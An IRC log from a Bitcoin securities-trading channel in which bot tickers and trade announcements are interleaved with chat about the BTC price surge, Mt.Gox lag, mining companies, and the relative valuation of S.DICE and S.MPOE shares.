44.30000, Bid-ask spread: 0.23925, Last trade: 44.30000, 24 hour volume: 101787.86062457, 24 hour low: 36.71000, 24 hour high: 45.00000, 24 hour vwap: 40.04730 Mar 06 05:17:12 neat Mar 06 05:17:42 and this is with people trying to buy via bitinstant and being left out of the game... Mar 06 05:19:02 ;;ticker Mar 06 05:19:07 BTCUSD ticker | Best bid: 44.01000, Best ask: 44.05000, Bid-ask spread: 0.04000, Last trade: 44.13135, 24 hour volume: 101769.80421578, 24 hour low: 36.71000, 24 hour high: 45.00000, 24 hour vwap: 40.09091 Mar 06 05:21:17 ;;asks 45 Mar 06 05:21:22 There are currently 274.49811 bitcoins offered at or under 45.0 USD, worth 12352.4148497 USD in total. | Data vintage: 0.0013 seconds Mar 06 05:21:22 dollar spread? Mar 06 05:21:37 3 minute trade excution reported in #bitcoin Mar 06 05:21:49 yeah Mar 06 05:21:52 ;;goxlag Mar 06 05:21:52 356.027482 seconds Mar 06 05:23:07 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23876878 = 238.7688 BTC [+] Mar 06 05:23:19 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.19154283 = 191.5428 BTC [+] Mar 06 05:23:20 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.21379583 = 213.7958 BTC [+] Mar 06 05:24:37 Hm. So... I took a look at the site, but it doesn't really talk about what this channel is for. Is it just general trading talk? Mar 06 05:24:44 [MPEX] [O.BTCUSD.C350T] 20 @ 0.29732419 = 5.9465 BTC [+] Mar 06 05:24:46 [MPEX] [O.BTCUSD.C370T] 60 @ 0.26660605 = 15.9964 BTC [+] Mar 06 05:24:48 Sorry if the question is a newbtastical one heh Mar 06 05:24:57 its for rational discussion Mar 06 05:25:00 keith_hanson try bitcoin-assets.com ? Mar 06 05:25:14 but in general, it's for bitcoin securities related talk + porn. Mar 06 05:25:34 porn eh Mar 06 05:25:36 by containing rational discussion it is set apart from any other bitcoin forum Mar 06 05:25:42 mircea_popescu: haha, nice. I gave the website a shot, but... you have to admit, it's pretty light on any sort of information :P Mar 06 05:26:00 yeah kakobrekla is a lover not a writer. Mar 06 05:26:11 dub: Well, so far so good then :P Mar 06 05:26:21 !ticker m ^OIX Mar 06 05:26:23 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 44.86994706 / 48.55677484 (no shares, 9,470.06 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 05:28:03 39$ btc on btc-e Mar 06 05:28:15 risk discount ? Mar 06 05:29:01 sry guys, i hit the Buy $1m button by accident Mar 06 05:29:05 dub why do you disparage reddit Mar 06 05:29:09 my bad Mar 06 05:29:16 ThickAssLaptop did it do anything ? Mar 06 05:29:29 made price hit 45 Mar 06 05:29:35 mircea_popescu: I don't pay much attention Mar 06 05:29:53 fol > lol ftr. Mar 06 05:29:53 looks like coinlabs ticker is not lagging Mar 06 05:29:59 the spread at btc-e is about $2 most of the time, but they get cash in via bitinstant, and that is fail Mar 06 05:30:08 farting out loud? Mar 06 05:30:10 only way to get cash now is sell ltc for cash, lol Mar 06 05:30:18 falling over Mar 06 05:30:26 Chaang-Noi soo is ltc goingdown ? Mar 06 05:30:28 bitinstant was working for me a bit ago? Mar 06 05:30:28 are you folling at my expense? Mar 06 05:30:48 mo a but now yes, but its sill up 250% in 3 days Mar 06 05:31:09 fuck i cant type... mp yes, it is going down a bit now, but still well up Mar 06 05:31:30 18.5 cents to 16 cents cuz cheap ass btc Mar 06 05:31:36 dub it happens to me when ppl push 1mn buttons Mar 06 05:31:38 39.5 still Mar 06 05:31:59 still, it was 14 yest. Mar 06 05:32:07 actually when i press it just tells me how many btc i wanna buy, 18889 Mar 06 05:32:18 ltc was 7 cents on friday Mar 06 05:32:23 and then they want my pph# Mar 06 05:32:32 i hold about 200k so im happy Mar 06 05:32:36 i'm not even single Mar 06 05:32:47 pph = Postpartum hemorrhage ? Mar 06 05:33:02 youve got my number Mar 06 05:34:42 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23924296 = 239.243 BTC [+] Mar 06 05:34:47 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.21423593 = 214.2359 BTC [+] Mar 06 05:34:53 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.19195264 = 191.9526 BTC [+] Mar 06 05:36:16 back to 43.. atleast i get to see it trade there :) Mar 06 05:36:41 I've never understood how people arbitrage across exchanges... doesn't the transfer of bitcoins from one account to the other take hours? Mar 06 05:36:48 http://www.examiner.com/article/wash-state-bill-allows-police-to-search-students-without-parental-consent Mar 06 05:36:51 that place srsly. Mar 06 05:37:04 not hours Mar 06 05:37:13 keith_hanson more like days. Mar 06 05:37:14 also the fees. Mar 06 05:37:23 so count two of us, i've never understood it either. Mar 06 05:37:36 ;;ticker Mar 06 05:37:37 unless you are transferring from BTCT Mar 06 05:37:37 BTCUSD ticker | Best bid: 43.33624, Best ask: 43.99000, Bid-ask spread: 0.65376, Last trade: 43.99000, 24 hour volume: 102601.01478656, 24 hour low: 36.71000, 24 hour high: 45.00000, 24 hour vwap: 40.14144 Mar 06 05:37:48 BTCT? Mar 06 05:38:02 sry its sorta a joke Mar 06 05:38:05 btct.co Mar 06 05:38:08 is an exchange Mar 06 05:38:11 Chaang-Noi the concern is that volume is still low Mar 06 05:38:15 we've not seen it peak. Mar 06 05:38:23 and they do manual withdrawals over like 5btc or so Mar 06 05:38:37 o.O Mar 06 05:38:42 I keep reading BCST instead of BTCT Mar 06 05:39:02 momentary WATing ensues Mar 06 05:39:04 yeah mo, im happy with anything over 25 really... Mar 06 05:39:11 mp i cant type for shit today... Mar 06 05:39:40 i wanna buy in, but... shrug Mar 06 05:40:36 33 to 45$ in 6 days ??? Mar 06 05:40:37 im waiting for $2 again Mar 06 05:40:37 ;;asks 55 Mar 06 05:40:37 There are currently 16666.852 bitcoins offered at or under 55.0 USD, worth 807037.068585 USD in total. | Data vintage: 32.2206 seconds Mar 06 05:40:41 ;;tslb Mar 06 05:40:44 Time since last block: 12 minutes and 17 seconds Mar 06 05:40:52 meanwhile... wtf. i thought it was 12th this week ? Mar 06 05:40:55 where are the th! Mar 06 05:40:58 ;;estimate Mar 06 05:41:03 Next difficulty estimate | 4749417.28355 based on data since last change | 4789887.21932 based on data for last three days Mar 06 05:41:20 supposedly they added a few TH at ozcoin Mar 06 05:41:44 asicminer is still kicking bfls ass:) Mar 06 05:41:50 you know i suspect they've not been able to keep hash within 10% for six hour straight since the beginning of the month. Mar 06 05:42:03 either their chips keep burning or software sucks or lots of overactive cats or wtf. Mar 06 05:42:16 Chaang-Noi i have a dead fish in the fridge that's kicking bfl's ass. Mar 06 05:42:31 lots of shaking things up to mask hashing for themselves Mar 06 05:42:50 ThickAssLaptop wait wut ? it's asicminer's business model to mine for themsleves. Mar 06 05:42:54 i hope bfl fails just as hard Mar 06 05:43:10 you know what i mean tho Mar 06 05:43:12 hope only 5% of bfls chips work:) Mar 06 05:43:20 backroom hashig Mar 06 05:43:22 n Mar 06 05:43:23 hm Mar 06 05:43:27 Mar06 03:42:56 btce 1.1179 @ 39.53 USD Mar 06 05:43:32 they wouldn't do THAT now would they ? Mar 06 05:43:32 ;;ticker Mar 06 05:43:33 BTCUSD ticker | Best bid: 42.50000, Best ask: 43.99000, Bid-ask spread: 1.49000, Last trade: 42.50000, 24 hour volume: 103543.75360681, 24 hour low: 36.71000, 24 hour high: 45.00000, 24 hour vwap: 40.17722 Mar 06 05:43:48 i mean WHY would they to THAT? Mar 06 05:43:49 1.5$ spread lulz Mar 06 05:43:50 mp they own over half the company, i dont think they will cheat much... Mar 06 05:44:13 error4733 looks like fiat supply problems Mar 06 05:44:18 no way to know anyway Mar 06 05:44:19 he has like 60% he is going to be one rich motherfucker Mar 06 05:44:37 Chaang-Noi if it ever gets to s,mpoe sort of market cap then yes. Mar 06 05:44:44 maybe he wants to be two rich motherfuckers Mar 06 05:46:10 assuming they get 10% of the coins in one year his 60% share is about 79k btc Mar 06 05:46:26 3.5 million us dollars Mar 06 05:46:39 just 1 year, i doubt he will need to cheat Mar 06 05:48:03 [HAVELOCK] [KCIM] 2 @ 0.955 = 1.91 BTC [-] Mar 06 05:48:05 greed doesnt requir eneed Mar 06 05:48:24 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.1921324 = 192.1324 BTC [+] Mar 06 05:48:26 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.2144312 = 214.4312 BTC [+] Mar 06 05:48:37 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23945589 = 239.4559 BTC [+] Mar 06 05:49:28 Sorry if I keep asking basic questions, but I'm taking you up on the intelligent discussion :P I get asked a lot where the value is coming from, and the only real answer I have is the "black market"/SR. Is that the general opinion or am I misinformed? Mar 06 05:49:45 you are misinformed. Mar 06 05:49:52 ;;google what are bitcoin market drivers Mar 06 05:49:53 What are the Bitcoin market drivers ? pe Trilema - Un blog de Mircea ...: ; George Clooney roils the Bitcoin market | FT Alphaville: ; Bitcoin Exchange Scam – Bitcoins Are Now Worthless | NERDr.com: Nice, thanks mircea_popescu Mar 06 05:50:35 “It is possible, I suppose, to imagine an extraordinary circumstance in which it would be necessary and appropriate under the Constitution and applicable laws of the United States for the President to authorize the military to use lethal force within the territory of the United States.” Mar 06 05:50:40 the us attorney general delivers. Mar 06 05:50:59 afaik it wasn't possible, under the constitution. Mar 06 05:51:03 [HAVELOCK] [SDICE] 1 @ 0.529 BTC [-] Mar 06 05:51:04 [HAVELOCK] [SDICE] 1 @ 0.528 BTC [-] Mar 06 05:51:04 maybe we're reading different copies. Mar 06 05:51:05 [HAVELOCK] [SDICE] 3 @ 0.5278 = 1.5834 BTC [-] Mar 06 05:51:06 [HAVELOCK] [SDICE] 1 @ 0.5275 BTC [-] Mar 06 05:51:07 [HAVELOCK] [SDICE] 5 @ 0.526 = 2.63 BTC [-] Mar 06 05:51:08 [HAVELOCK] [SDICE] 2 @ 0.5252 = 1.0504 BTC [-] Mar 06 05:51:23 thats regarding drones? Mar 06 05:52:01 well, it's regarding weaseling Mar 06 05:52:06 but was brought about by drone discussion. Mar 06 05:53:17 yes, we would like the convenience of attacking you with robots, let's keep that option open Mar 06 05:54:01 we also want to wiretap so we can listen to your reaction lol Mar 06 05:54:11 lol Mar 06 05:54:32 [MPEX] [S.DICE] 100 @ 0.004551 = 0.4551 BTC [-] Mar 06 05:54:34 [MPEX] [S.DICE] 100 @ 0.00444446 = 0.4444 BTC [-] Mar 06 05:54:39 [MPEX] [S.DICE] 1000 @ 0.00444444 = 4.4444 BTC [-] Mar 06 05:54:41 [MPEX] [S.DICE] 7000 @ 0.0044444 = 31.1108 BTC [-] Mar 06 05:54:45 [MPEX] [S.DICE] 13031 @ 0.0044444 = 57.915 BTC [-] Mar 06 05:54:53 bargain prices Mar 06 05:55:29 flushing the s.deuce Mar 06 05:55:35 o hey Mar 06 05:56:24 it's the ghost of the 1st tranche Mar 06 05:56:39 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.21475103 = 214.751 BTC [+] Mar 06 05:56:41 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.23980148 = 239.8015 BTC [+] Mar 06 05:56:43 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.19242937 = 192.4294 BTC [+] Mar 06 05:56:59 you suppose people are selling anything they can to get options funds ? Mar 06 05:57:31 doesnt add up Mar 06 05:57:35 yea indeed. Mar 06 06:00:04 [BTCTC] [S.DICE-PT] 100 @ 0.00568 = 0.568 BTC [-] Mar 06 06:01:46 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.19340518 = 193.4052 BTC [+] Mar 06 06:01:54 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.2157941 = 215.7941 BTC [+] Mar 06 06:02:02 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.24091935 = 240.9194 BTC [+] Mar 06 06:02:33 !ticker m ^oix Mar 06 06:02:35 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 46.44009073 / 49.47150622 (no shares, 12,058.61 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 06 06:03:55 fun fact of the day : mpoe option book notional exposure passes 3mn usd. Mar 06 06:04:31 this is more than the combined total of all venture capital taken in by all bitcoin ventures iirc. Mar 06 06:05:22 but coinlab Mar 06 06:05:30 they got like 500k neh ? Mar 06 06:05:36 thats it? Mar 06 06:05:39 afaik. Mar 06 06:05:52 i dunno, just throwing that out there, see if anyone has better data. Mar 06 06:05:55 how do get a deal with gox holding tht little Mar 06 06:06:12 [BTCTC] [S.MPOE-PT] 350 @ 0.00073 = 0.2555 BTC [+] Mar 06 06:07:58 they maybe had really good collectible cards ? Mar 06 06:07:59 mp ltc back over 28 cents, crazy Mar 06 06:08:10 rising tide raises all boats Mar 06 06:08:13 or so ppl hope maybe Mar 06 06:08:26 yeah i dont know Mar 06 06:08:39 i thought it was way undervalued but this was one hell of a pop Mar 06 06:08:45 4x Mar 06 06:08:51 not 28 Mar 06 06:08:53 18 Mar 06 06:09:03 [HAVELOCK] [SDICE] 1 @ 0.5252 BTC [-] Mar 06 06:09:27 http://falkvinge.net/2013/03/06/the-target-value-for-bitcoin-is-not-some-50-or-100-it-is-100000-to-1000000/#comment-111758 Mar 06 06:09:30 lol poor falkvinge Mar 06 06:09:42 i posted that here an hour ago:) Mar 06 06:09:48 i know. and i commented Mar 06 06:09:50 and then passed it along Mar 06 06:10:01 and now he's being stomped like "gtfo, old news" etc. Mar 06 06:10:17 im using it to troll /g/ on 4chan they think bitcoin is a scam Mar 06 06:10:38 lol something bawful is in a fret too Mar 06 06:10:53 kinda funny being internet's cool kids, by 185 degrees of magnitude Mar 06 06:11:25 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.2159899 = 215.9899 BTC [+] Mar 06 06:11:27 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.24113267 = 241.1327 BTC [+] Mar 06 06:11:30 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.19358548 = 193.5855 BTC [+] Mar 06 06:11:35 "the buyings shall continue until morale improves" Mar 06 06:11:44 lol something bawful Mar 06 06:13:13 in other news, time for http://polimedia.us/dtng/c/src/136254317934.jpg Mar 06 06:13:29 You don't have permission to access /dtng/c/src/136254317934.jpg on this server. Mar 06 06:14:03 [HAVELOCK] [SDICE] 15 @ 0.5251 = 7.8765 BTC [-] Mar 06 06:14:45 https://boards.4chan.org/g/res/32052146 if anyone wants to troll... Mar 06 06:15:09 . /g/ has been calling bitcoin a scam for years now... they missed the boat Mar 06 06:15:35 "When is coinbase going to start selling bitcoins again? They've been "over their limit" for the past couple days." Mar 06 06:15:36 heh. Mar 06 06:16:59 yeah.. its like the meme with fry holding the cash saying shut up and take my money... Mar 06 06:17:47 ;;ticker Mar 06 06:17:47 BTCUSD ticker | Best bid: 43.03099, Best ask: 43.37291, Bid-ask spread: 0.34192, Last trade: 42.99000, 24 hour volume: 104489.74859354, 24 hour low: 36.91110, 24 hour high: 45.00000, 24 hour vwap: 40.28010 Mar 06 06:18:19 ;;asks 69 Mar 06 06:18:20 There are currently 34857.932 bitcoins offered at or under 69.0 USD, worth 1979397.98148 USD in total. | Data vintage: 15.1042 seconds Mar 06 06:19:19 so two button pushes Mar 06 06:19:38 69 is top Mar 06 06:19:56 ThickAssLaptop 69 is bottom for thick ass. Mar 06 06:21:48 [MPEX] [O.BTCUSD.C410T] 592 @ 0.21606942 = 127.9131 BTC [+] Mar 06 06:21:49 [MPEX] [O.BTCUSD.C430T] 785 @ 0.19365695 = 152.0207 BTC [+] Mar 06 06:21:55 [MPEX] [O.BTCUSD.C390T] 355 @ 0.24122141 = 85.6336 BTC [+] Mar 06 06:22:02 and we're sold out. Mar 06 06:24:23 ;;tslb Mar 06 06:24:27 Time since last block: 19 minutes and 11 seconds Mar 06 06:24:30 holy hell. Mar 06 06:26:28 waiting forever for my deposit Mar 06 06:27:46 ppl are wanting to buy options, i'm like... well i guess you might have sent it two hours ago but if it ain't confirmed it ain't confirmed. Mar 06 06:27:54 the value of keeping your liquidity in the right places i guess. Mar 06 06:28:35 indeed Mar 06 06:29:17 this is officially the most exciting time of bitcoin i've ever lived. Mar 06 06:31:38 went to troll /g/ /g/ wants to buy... fuuuck what just happened.... Mar 06 06:32:02 /g/ == ? Mar 06 06:32:07 ltc for the win, that is the fastness Mar 06 06:32:20 . /g/ on 4chan, said btc was a scam for years.. now they want to buy Mar 06 06:32:26 https://boards.4chan.org/g/res/32052146 Mar 06 06:32:30 yes, what is /g/ Mar 06 06:32:41 no fucking way I am hitting 4chan from work Mar 06 06:32:42 twink pron ? Mar 06 06:33:08 g/ - Technology Mar 06 06:33:29 I was dude the other day with dog paw tattoo with TWINK under it, hope he never goes to teh states Mar 06 06:34:08 why not ? Mar 06 06:34:21 yeah dont go to 4chan at work,... even the calm and mostly safe /g/ Mar 06 06:34:25 so eu stocks at 4 year high mark, dow is busting records Mar 06 06:34:28 he probbly doesnt know knwat twink means in teh states Mar 06 06:34:29 btc goes up 50% in A DAY Mar 06 06:34:40 (its a brand name here) Mar 06 06:34:43 clearly our idiotarian policymaker friends are doing things right. Mar 06 06:34:58 i get a truck, im happy Mar 06 06:35:14 us inflation will be triple digit in 2013. Mar 06 06:38:03 being a web developer, I want to take mtgox and overhaul their UI. Their new mobile site is atrocious. Mar 06 06:38:06 [MPEX] [S.MPOE] 3600 @ 0.00075 = 2.7 BTC [+] Mar 06 06:39:23 just make a new exchange, gox is going to self destruct in a week anyway Mar 06 06:39:37 replace week with a few months Mar 06 06:40:04 I thought migration to coinlol happens on the 12th Mar 06 06:41:45 nite Mar 06 06:43:06 mircea_popescu: uh, seriously? that's... concerning. Mar 06 06:43:38 keith_hanson it is. Mar 06 06:43:43 mircea_popescu: What do you guys use then? Mar 06 06:45:07 ;;ticker Mar 06 06:45:08 BTCUSD ticker | Best bid: 44.00000, Best ask: 44.15000, Bid-ask spread: 0.15000, Last trade: 44.00000, 24 hour volume: 106697.45574715, 24 hour low: 36.93101, 24 hour high: 45.00000, 24 hour vwap: 40.37604 Mar 06 06:45:16 ;;asks 45 Mar 06 06:45:16 There are currently 1236.3618 bitcoins offered at or under 45.0 USD, worth 55413.0152492 USD in total. | Data vintage: 54.7067 seconds Mar 06 06:45:26 ;;asks 50 Mar 06 06:45:26 There are currently 12874.465 bitcoins offered at or under 50.0 USD, worth 614113.730099 USD in total. | Data vintage: 64.7913 seconds Mar 06 06:51:00 keith_hanson i don't use anything, not really buying. Mar 06 06:51:04 when i do buy i use the otc. Mar 06 06:51:47 oh, wow. Didn't realize that existed :D Mar 06 06:52:18 I have learned more in an hour here than I have in months on reddit, bitcointalk, or any other web sources :P much appreciated Mar 06 06:53:37 you're welcome Mar 06 06:53:47 the otc system revolves around the wot, ask gribble about that. Mar 06 06:54:44 [MPEX] [O.BTCUSD.C510T] 250 @ 0.12633113 = 31.5828 BTC [+] Mar 06 06:56:50 [MPEX] [O.BTCUSD.C510T] 6 @ 0.12633113 = 0.758 BTC [+] Mar 06 06:57:35 ;;ticker Mar 06 06:57:35 BTCUSD ticker | Best bid: 44.00000, Best ask: 44.01000, Bid-ask spread: 0.01000, Last trade: 44.00000, 24 hour volume: 107173.30759404, 24 hour low: 37.01715, 24 hour high: 45.00000, 24 hour vwap: 40.42137 Mar 06 07:01:01 We're going skyhigh Mar 06 07:02:28 [MPEX] [O.BTCUSD.C470T] 75 @ 0.15734141 = 11.8006 BTC Mar 06 07:05:58 [MPEX] [S.MPOE] 19207 @ 0.00075 = 14.4053 BTC [+] Mar 06 07:08:39 [MPEX] [S.DICE] 2000 @ 0.00450001 = 9 BTC [+] Mar 06 07:09:00 When people buy lots of options, usually a good time to buy S.MPOE Mar 06 07:09:08 s.dice not so sky high Mar 06 07:09:14 Hmm, S.DICE going down down down Mar 06 07:10:02 no buyers Mar 06 07:10:33 indeed, no buyers Mar 06 07:12:29 there's a big fat ask there at 0.0047 Mar 06 07:12:38 that would have gone in a flash last week I think Mar 06 07:12:49 yeah Mar 06 07:12:57 that was before price skyrocketed Mar 06 07:13:04 Now everyone wants BTC in their hands Mar 06 07:14:36 makes sense Mar 06 07:14:51 [MPEX] [S.DICE] 1000 @ 0.00450001 = 4.5 BTC [+] Mar 06 07:16:37 DT going on 'holiday' to italy Mar 06 07:17:01 crawling back up to 45... Mar 06 07:17:03 [MPEX] [S.DICE] 100 @ 0.0045 = 0.45 BTC [-] Mar 06 07:17:05 [MPEX] [S.DICE] 100 @ 0.0044444 = 0.4444 BTC [-] Mar 06 07:17:06 [MPEX] [S.DICE] 100 @ 0.00300001 = 0.3 BTC [-] Mar 06 07:17:15 praps catchign up with his best buddy alberto Mar 06 07:19:28 S.DICE trading at 0.00300001? gosh... Mar 06 07:19:49 [MPEX] [S.DICE] 100 @ 0.00450001 = 0.45 BTC [+] Mar 06 07:19:57 what is surprising about that? Mar 06 07:20:08 huge drop Mar 06 07:21:53 [MPEX] [S.MPOE] 863500 @ 0.00075 = 647.625 BTC [+] Mar 06 07:22:13 Only 100 traded that low Mar 06 07:22:17 MPOE is in demand, on the other hand Mar 06 07:22:36 Of course, lots of options being traded Mar 06 07:22:45 even though its divs performance is consistently worse than s.dice's Mar 06 07:23:17 like way worse Mar 06 07:23:57 it must be a confidence thing. perhaps people have little faith that s.dice will be around long term. Mar 06 07:24:00 [MPEX] [S.MPOE] 175000 @ 0.00075 = 131.25 BTC [+] Mar 06 07:24:11 I guess if you consider MPEx's track record and long term, if people expect Bitcoins to become mainstream and MPEx to retain it's #1 position to trade assets... Mar 06 07:24:15 maximian: or that there won't be any more surprise share splits Mar 06 07:24:37 dice at .003? id buy at that price some... Mar 06 07:24:41 Well S.MPOE could dramatically improve with a majority of assets trading moving to MPEx Mar 06 07:25:03 [MPEX] [S.BBET] 4000 @ 0.0015 = 6 BTC [-] Mar 06 07:25:12 Namworld: why would htat affect s.mpe? Mar 06 07:25:15 asic miner is the next big hot trader i bet Mar 06 07:25:24 actually, MP has regularly dumped mpoe shares as well, but he did it differently: he placed large asks well above the market price Mar 06 07:25:29 so nobody cared Mar 06 07:25:59 maximian actually more an attempt to keep it from bubbling up than anything. Mar 06 07:26:03 evoorhees, on the other hand, sold way below market price for some crazy unfathomable reason, which was a big WTF Mar 06 07:26:20 evoorhees could have done the same Mar 06 07:26:26 i think the fact that mpoe/mpex can't have a lossy month for shareholders may be a factor. Mar 06 07:26:27 yes but he's an idiot Mar 06 07:26:32 but oh well. it shook a lot of people's confidence. Mar 06 07:26:45 dub: fees? Mar 06 07:26:46 if people are thinking "s.dice has consistantly been over EV" it may be a consideration. Mar 06 07:26:55 tho tbh... it doesn't seem to account for the disparity. Mar 06 07:27:19 Namworld: I didn't know fees contributed to s.mpoe, its not just the options? Mar 06 07:27:41 dub http://trilema.com/mpoe-february-2013-statement Mar 06 07:27:55 Revenue from sales fee : 187.80380028 BTC (Total trade : 93`901.90014227 BTC) Mar 06 07:27:55 Revenue from new accounts : 70 BTC Mar 06 07:28:01 I think people know that mope is here to stay, but there's a lot of uncertainty around s.dice Mar 06 07:28:24 and unfortunately, evoorhees is distracted with conferences and his other hobbies Mar 06 07:28:26 maximian ironically enough s.mpoe shares were bought as low as 2k satoshi. Mar 06 07:28:34 no, fees, options, incorrect deposits, etc Mar 06 07:28:37 so they do Mar 06 07:28:45 It's all of MPEx's income, really Mar 06 07:29:11 lol incorrect deposits Mar 06 07:29:16 ftr an incorrect deposit has yet to make it to shareholders. there was a grand total of like, 1 so far. Mar 06 07:29:57 good to know that people with enough BTC to trade on MPEx can manage not to screw up deposits. Mar 06 07:32:02 but anyway, s.dice has so far paid ~50k satoshi per share in dividends to s.mpoe's ~2k Mar 06 07:32:12 yet their marketcaps are like 2:1 in favour of s.mpoe Mar 06 07:32:36 on a strictly dividend basis of accounting it's a huge gap. Mar 06 07:32:38 it's a stark difference Mar 06 07:32:44 so there must be other factors Mar 06 07:34:34 course if you think about it, a corp that issues 10% divs a year is not automatically better than one that issues 3% Mar 06 07:34:38 irl i mean Mar 06 07:35:32 actually i'd be much surprised if the average retail investor could even tell you what dividend his portofolio paid Mar 06 07:35:42 Coca-Cola has low yearly yield. Mar 06 07:35:46 not if everyone expects it to flame out early Mar 06 07:36:06 I think. Still great stock. Stable, very old company. Popular as ever. Mar 06 07:36:52 maximian i guess maybe that's it, in spite of early explosive success people expect it to flame Mar 06 07:36:56 or maybe not in spite. Mar 06 07:36:57 There's a few multinationals like that with low yield and high demand. Safety and stability are good to consider. Mar 06 07:37:45 yep, high uncertainty over its future: can it maintain its market share, will evoorhees get arrested, etc Mar 06 07:37:58 course there's another thing : on the strength of the book so far, s.mpoe could walk home with 20-30k btc. Mar 06 07:38:05 motnh has barely started. Mar 06 07:38:26 on the strength of the action so far, s.dice is ahead what, 2k yet ? Mar 06 07:38:37 yeah, amazing Mar 06 07:38:54 s.dice not doing so well so far this month, but that's to be expected now and then Mar 06 07:39:01 so maybe that's what's driving prices really Mar 06 07:39:16 nobody had a problem back in november when s.dice paid zero Mar 06 07:39:18 the immediate outlook. "shot at 20-30k with no downside" vs "not so great, maybe 2k, maybe negative" Mar 06 07:39:30 thus one goes 65 to 75 the other 62 to 45 Mar 06 07:39:48 maximian yeah but investor composition changed a lot, lots of pt holders, Mar 06 07:39:50 lots of small holders Mar 06 07:39:53 yep, I agree Mar 06 07:39:54 those are always volatile Mar 06 07:40:04 true Mar 06 07:40:08 !ticker m s.dice Mar 06 07:40:10 [MPEX:S.DICE] 1D: 0.00300001 / 0.0046852 / 0.00579999 (39585 shares, 185.46 BTC), 7D: 0.00300001 / 0.0058052 / 0.0063799 (554773 shares, 3,220.57 BTC), 30D: 0.00300001 / 0.00589794 / 0.007395 (6726620 shares, 39,673.22 BTC) Mar 06 07:40:31 day's volume is 200 btc. that's not much really. Mar 06 07:41:39 evoorhees has to get cracking and start promoting this thing again! Mar 06 07:42:03 he was saying something about irl gambling deal. Mar 06 07:42:09 course he's been saying that for a while Mar 06 07:42:41 It wasn't clear that he was talking about s.dice, but it would be nice if he's hinting at an acquisition or partnership Mar 06 07:43:30 ;;ticker Mar 06 07:43:30 BTCUSD ticker | Best bid: 44.20000, Best ask: 44.25000, Bid-ask spread: 0.05000, Last trade: 44.15000, 24 hour volume: 108129.84604915, 24 hour low: 37.41306, 24 hour high: 45.00000, 24 hour vwap: 40.54922 Mar 06 07:43:35 imo, the best case scenario for s.dice is an acquisition by a big player looking for a quick entrance into btcland Mar 06 07:43:36 ;;calc 46852 * 40.55 Mar 06 07:43:36 1899848.6 Mar 06 07:43:41 [MPEX] [S.MPOE] 17900 @ 0.00075 = 13.425 BTC [+] Mar 06 07:43:55 19 mn or so are certainly nothing for sometyhing like s,dice Mar 06 07:44:05 so a deal will prolly be a nice payout for btc shareholders. Mar 06 07:44:06 exactly Mar 06 07:44:09 course, it has to happen first. Mar 06 07:44:28 tremendous mindshare/brand awareness for a bargain price of 19-20m Mar 06 07:44:29 but i can see erik reasonably walking away from anything under 100mn total Mar 06 07:44:36 which you know... would be a 500% gain Mar 06 07:44:52 yep, it's a possibility, and I believe he's the kind of guy who could pull it off. Mar 06 07:44:56 spam detected Mar 06 07:45:55 [MPEX] [O.BTCUSD.C450T] 500 @ 0.17591975 = 87.9599 BTC [+] Mar 06 07:46:00 i imagine he's pretty motivated to do it too. Mar 06 07:46:11 no better way to showcase btc success than a successful exit for him. Mar 06 07:47:33 coingenuity https://bitcointalk.org/index.php?topic=144611.msg1585748#msg1585748 Mar 06 07:48:18 I think the current success would be shorting your BTC for USD Mar 06 07:48:25 Buy back later at a lower price Mar 06 07:49:01 you can sell calls short which would be doing exactly that. Mar 06 07:49:07 but it'd take a brave man. Mar 06 07:49:59 eh, none of that for me Mar 06 07:50:56 I think 67117 is proxy pool. The hash output is always simillar to SLUSH's. SLUSH has 2.6% rejection rate -they obviusly proxy pooling. Still not real proof of working ASIC. Mar 06 07:50:57 ouch Mar 06 07:51:05 anyone rthat understands mining, how sensible is that ? Mar 06 07:51:20 specifically, how traceable is hashing based on the reject rate ? Mar 06 07:51:53 network hashing is estimated based on blocks found... Mar 06 07:52:04 no i mean Mar 06 07:52:17 obviously i can set up a mining pool account and proxy other peoples mining there. Mar 06 07:52:30 question is, can this be at all traced based on some qualities of the hash flux Mar 06 07:53:43 Not sure how it works. Mar 06 07:53:48 sales on gox slowed Mar 06 07:53:51 ;;ticker Mar 06 07:53:52 BTCUSD ticker | Best bid: 44.00000, Best ask: 44.12509, Bid-ask spread: 0.12509, Last trade: 43.66490, 24 hour volume: 108414.79454220, 24 hour low: 37.41306, 24 hour high: 45.00000, 24 hour vwap: 40.57198 Mar 06 07:54:03 about time it slowed a bit... Mar 06 07:54:17 yeah Mar 06 07:54:53 108k is some decent volume anyway Mar 06 07:58:51 o hey, it occurs to me, this is the right time to get hacked right ? Mar 06 07:59:04 [HAVELOCK] [SDICE] 45 @ 0.49100001 = 22.095 BTC [-] Mar 06 07:59:05 [HAVELOCK] [SDICE] 1 @ 0.491 BTC [-] Mar 06 07:59:07 [HAVELOCK] [SDICE] 10 @ 0.4682 = 4.682 BTC [-] Mar 06 07:59:08 [HAVELOCK] [SDICE] 2 @ 0.4681 = 0.9362 BTC [-] Mar 06 07:59:08 [HAVELOCK] [SDICE] 2 @ 0.4674 = 0.9348 BTC [-] Mar 06 07:59:09 [HAVELOCK] [SDICE] 1 @ 0.4588 BTC [-] Mar 06 07:59:10 [HAVELOCK] [SDICE] 18 @ 0.4511 = 8.1198 BTC [-] Mar 06 08:00:31 mr. p. I'd say that's the biggest wild card at the moment - a high profile hack. your shit is safe right? Mar 06 08:01:26 aiball as safe as i know how to make it. 